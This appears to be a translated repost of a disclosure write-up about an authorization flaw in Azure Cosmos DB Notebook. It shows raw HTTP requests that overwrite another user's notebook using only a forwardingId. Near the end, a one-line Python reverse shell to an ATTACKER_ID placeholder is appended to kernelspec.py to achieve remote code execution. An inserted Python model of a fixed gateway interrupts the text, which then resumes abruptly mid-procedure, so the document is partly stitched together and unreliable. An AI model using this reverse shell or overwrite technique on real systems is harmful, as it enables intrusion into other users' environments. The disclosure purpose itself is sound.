Preface
Azure Cosmos DB Notebook is a tool for data analysis and querying within Azure Cosmos DB. It provides an interactive environment in which queries are written and run, and data is analysed, in the style of a Jupyter Notebook. Users can write code in a notebook to connect to Azure Cosmos DB databases and containers, manipulate data in several languages, and perform tasks such as real-time stream processing.
Main text
The main page looks like this:
When a new Notebook is created, the following request is sent:
POST
/api/controlplane/toolscontainer/cosmosaccounts/subscriptions/[tenant-id]/resourceGroups/Orca-Research/providers/Microsoft.DocumentDB/databaseAccounts/orca-cosmos-dev/containerconnections/multicontainer HTTP/2
Host: tools.cosmos.azure.com
Content-Length: 88
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Authorization: Bearer
eyJ0eXAiOiJKV1QiLdaaaxxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.eyJhdWQddaaam5ldC8yMjdkY2ExZC1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://cosmos.azure.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cosmos.azure.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-IL,en;q=0.9,he-IL;q=0.8,he;q=0.7,en-US;q=0.6,pl;q=0.5
{"cosmosEndpoint":"https://orca-cosmos-dev.documents.azure.com:443/","poolId":"default"}
The response is as follows:
As can be seen, the server returns a forwardingId; this value appears in the API paths of all subsequent requests.
During the penetration test, the attacker's forwardingId was 27f180bc-cf93-4c42-b23e-f27a5085da57:
Testing showed that the following endpoint lists the notebooks on the same server:
https://seasia.tools.cosmos.azure.com:10007/api/containergateway/27f180bc-cf93-4c42-b23e-f27a5085da57(i.e. the forwardingId)/api/contents/notebooks
Removing the Authorization request header and observing the response shows that this endpoint performs no authorization:
Further testing showed that every endpoint on the site lacks authorization: anyone who knows a victim's forwardingId can call all of the endpoints to read, write and modify that victim's notebooks.
Proof:
1. Use this endpoint to obtain the kernel IDs
/api/containergateway/[forwardingId]/api/kernels/
2. Overwrite or delete the code of any Notebook
Write some code in the Notebook:
Save:
The request is as follows:
Change the GET request to a PUT, build a JSON request body from the contents of the response, and send it to the server:
PUT
/api/containergateway/27f180bc-cf93-4c42-b23e-f27a5085da57/api/contents/notebooks/Untitled.ipynb HTTP/2
Host: seasia.tools.cosmos.azure.com:10007
Content-Length: 983
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://cosmos.azure.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cosmos.azure.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-IL,en;q=0.9,he-IL;q=0.8,he;q=0.7,en-US;q=0.6,pl;q=0.5
{"kernel":{"id":null,"name":"python3"},"name":"",
"content": {"cells": [{"cell_type": "code", "execution_count": 1, "id": "47bdbef0-ea14-4960-8789-7983e63312dd", "metadata": {"collapsed": true, "execution": {"iopub.execute_input": "2022-10-02T08:06:27.283Z", "iopub.status.busy": "2022-10-02T08:06:27.277Z", "iopub.status.idle": "2022-10-02T08:06:27.299Z", "shell.execute_reply": "2022-10-02T08:06:27.292Z"}, "jupyter": {"outputs_hidden": false, "source_hidden": false}, "nteract": {"transient": {"deleting": false}}, "trusted": true}, "outputs": [{"name": "stdout", "output_type": "stream", "text": "hacked\n"}], "source": "print('Hacked!')"}], "metadata": {"language_info": {"file_extension": "ipynb", "mimetype": "application/json", "name": "python", "version": "3.7"}, "nteract": {"version": "dataExplorer 1.0"}}, "nbformat": 4, "nbformat_minor": 5}, "format": "json", "mimetype": null, "size": 993, "writable": true, "path":"notebooks/Untitled.ipynb","type":"notebook"}
After refreshing the page in the browser, the contents of the request body have overwritten the code that was previously in the Notebook:
Likewise, we can delete code and perform other operations.
Further testing found that, when the Azure UI loads the Cosmos Data Explorer, this API is used to build the explorer dashboard:
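The root cause described above is that the container gateway treats the forwardingId as if it were a credential: any request that carries a known forwardingId is served, whether or not a valid bearer token is present and whether or not that token belongs to the user the forwardingId was issued to. The following Python model is an added example, not code from the original post, from Orca Security or from Microsoft. It uses a toy HMAC-signed token as a stand-in for the real JWT, an in-memory session store, and hypothetical handler names (put_contents_vulnerable / put_contents_fixed); it shows the defective check beside the hardened one, in which the gateway binds every forwardingId to the principal that created it.

```python
# Added example: a minimal model of a notebook container gateway that routes on an
# opaque forwardingId. The token format, session store and handler names are
# assumptions for illustration, not the real service's implementation.
import base64
import hashlib
import hmac
import json
import uuid

SECRET = b"server-side-signing-key"  # constructed for the example


def issue_token(subject: str) -> str:
    """Toy bearer token: base64(json payload) + '.' + HMAC-SHA256 tag (stand-in for a JWT)."""
    payload = base64.urlsafe_b64encode(json.dumps({"sub": subject}).encode()).decode()
    tag = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_token(token):
    """Return the token's subject, or None if the token is absent, malformed or forged."""
    try:
        payload, tag = token.split(".", 1)
    except (ValueError, AttributeError):
        return None
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))["sub"]


def bearer(headers):
    value = headers.get("Authorization", "")
    return value[7:] if value.startswith("Bearer ") else None


class Gateway:
    def __init__(self):
        self.sessions = {}   # forwardingId -> subject the id was issued to
        self.notebooks = {}  # forwardingId -> {path: source}

    def create_connection(self, headers):
        """Mirrors POST .../containerconnections: only an authenticated caller gets a
        forwardingId, and the gateway records who it was issued to."""
        sub = verify_token(bearer(headers))
        if sub is None:
            return 401, None
        fid = str(uuid.uuid4())
        self.sessions[fid] = sub
        self.notebooks[fid] = {"notebooks/Untitled.ipynb": "print('hello')"}
        return 200, {"forwardingId": fid}

    def put_contents_vulnerable(self, fid, path, source, headers):
        """The defect: the route checks only that the forwardingId exists; the
        Authorization header is never looked at, so the id alone grants write access."""
        if fid not in self.sessions:
            return 404
        self.notebooks[fid][path] = source
        return 200

    def put_contents_fixed(self, fid, path, source, headers):
        """Hardened handler: a valid token is required AND the forwardingId must have
        been issued to that token's subject. Unknown and foreign ids get the same
        answer so the endpoint does not act as an oracle for valid ids."""
        sub = verify_token(bearer(headers))
        if sub is None:
            return 401
        if self.sessions.get(fid) != sub:
            return 403
        self.notebooks[fid][path] = source
        return 200


def demo():
    """Exercise both handlers with a victim's forwardingId and three callers."""
    gw = Gateway()
    victim = {"Authorization": "Bearer " + issue_token("victim@example.com")}
    other = {"Authorization": "Bearer " + issue_token("other@example.com")}
    status, resp = gw.create_connection(victim)
    assert status == 200
    fid = resp["forwardingId"]
    path = "notebooks/Untitled.ipynb"
    return {
        "vuln_no_token": gw.put_contents_vulnerable(fid, path, "print('Hacked!')", {}),
        "fixed_no_token": gw.put_contents_fixed(fid, path, "x", {}),
        "fixed_other_user": gw.put_contents_fixed(fid, path, "x", other),
        "fixed_forged_token": gw.put_contents_fixed(fid, path, "x", {"Authorization": "Bearer abc.def"}),
        "fixed_owner": gw.put_contents_fixed(fid, path, "print('mine')", victim),
        "final_source": gw.notebooks[fid][path],
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable handler returns 200 for a caller that sends no Authorization header at all, which is exactly the behaviour observed above; the fixed handler returns 401 for a missing or forged token and 403 when the token is valid but the forwardingId was issued to someone else, and only the owner's write succeeds. The design point is that an unguessable id is a routing key, not an authorization decision: the binding between the id and the principal has to be checked on every request, not only when the id is issued.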
/home/cosmosuser/.local/lib/python3.6/site-packages/jupyter_client/kernelspec.py
We can still overwrite every file in the /home/cosmosuser directory, including this kernelspec.py file.
Now change the GET request to a PUT and, in the request body, add the original contents of the .py file followed by the reverse shell script below:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_ID\",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")
After sending the request and refreshing the page, RCE is achieved:
Original source:
https://orca.security/resources/blog/cosmiss-vulnerability-azure-cosmos-db/
Originally published on the WeChat public account 芳华绝代安全团队: RCE in Azure Cosmos DB Notebook